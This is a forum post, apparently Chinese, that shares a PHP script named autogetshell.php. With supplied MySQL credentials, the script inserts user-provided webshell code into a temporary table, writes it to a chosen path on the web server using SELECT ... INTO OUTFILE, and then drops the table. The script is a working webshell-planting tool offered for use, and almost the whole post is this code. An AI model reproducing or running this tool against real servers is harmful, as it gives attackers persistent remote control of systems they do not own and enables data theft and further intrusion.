来源:网络技术论坛
代码
复制内容到剪贴板
代码:
<?php
if ($step==1){
$link = mysql_connect($servername,$dbusername,$dbpassword);
if ($link) {
echo "<p>数据库服务器连接成功</p>";
$mysql_select=mysql_select_db($dbname);
if (!$mysql_select) {
echo "<p>test create db $dbname</p>";
if (mysql_create_db($dbname)) {echo "<p> .....:)</p>";
} else {
echo "<p>.....:(</p>";}
}
$ctable = " CREATE TABLE a (cmd text NOT NULL)";
$indata="INSERT INTO a (cmd) VALUES ('".$code."')";
$outdata="select cmd from a into outfile '".$path."'";
$dptable= "DROP TABLE IF EXISTS a";
$res = mysql_query($ctable);
if ($res) {echo "<p>建立表格....成功</p>";}else{echo "<p>建立表格....失败</p>";}
$res1 = mysql_query($indata);
if ($res1) {echo "<p>导入shell代码....成功</p>";} else{echo "<p>导入shell代码....失败</p>";}
echo $outdata;
$res2 = mysql_query($outdata);
if ($res2) {echo "<p>导出shell....成功</p>";} else{echo "<p>导出shell....失败</p>";}
$res3 = mysql_query($dptable);
if ($res3) {echo "<p>删除数据....成功</p>";} else{echo "<p>删除数据....成功</p>";}
} else {
echo "<p>数据库服务器连接失败</p>";}
mysql_close($link);
//表单填写
} else{
echo "<b>设置数据</b>\n";
echo "<p><form action=\"autogetshell.php\" method=\"post\"></p>\n";
echo "<p><input type=\"hidden\" name=\"step\" value=\"1\"></p>\n";
echo "<p>服务器地址:<input type=\"text\" value=\"".$servername."\"name=\"servername\"></p>\n";
echo "<p>数据库名: <input type=\"text\" value=\"".$dbname."\" name=\"dbname\"></p>\n";
echo "<p>数据库用户名: <input type=\"text\" value=\"".$dbusername."\" name=\"dbusername\"></p>\n";
echo "<p>数据库用户密码: <input type=\"password\" value=\"\" name=\"dbpassword\"></p>\n";
echo "<p>导出webshell路径: <input type=\"text\" value=\"".$path."\" name=\"path\"></p>\n";
echo "<p>=========================================================</P>\n";
echo "<p>webshell代码: <textarea value=\"".$code."\" name=\"code\" cols=80 rows=10 width=32></textarea></p>\n";
echo "<p><input type=\"submit\" name=\"next\" value=\"提交\"></p>\n";
echo "</form>";
}
?>
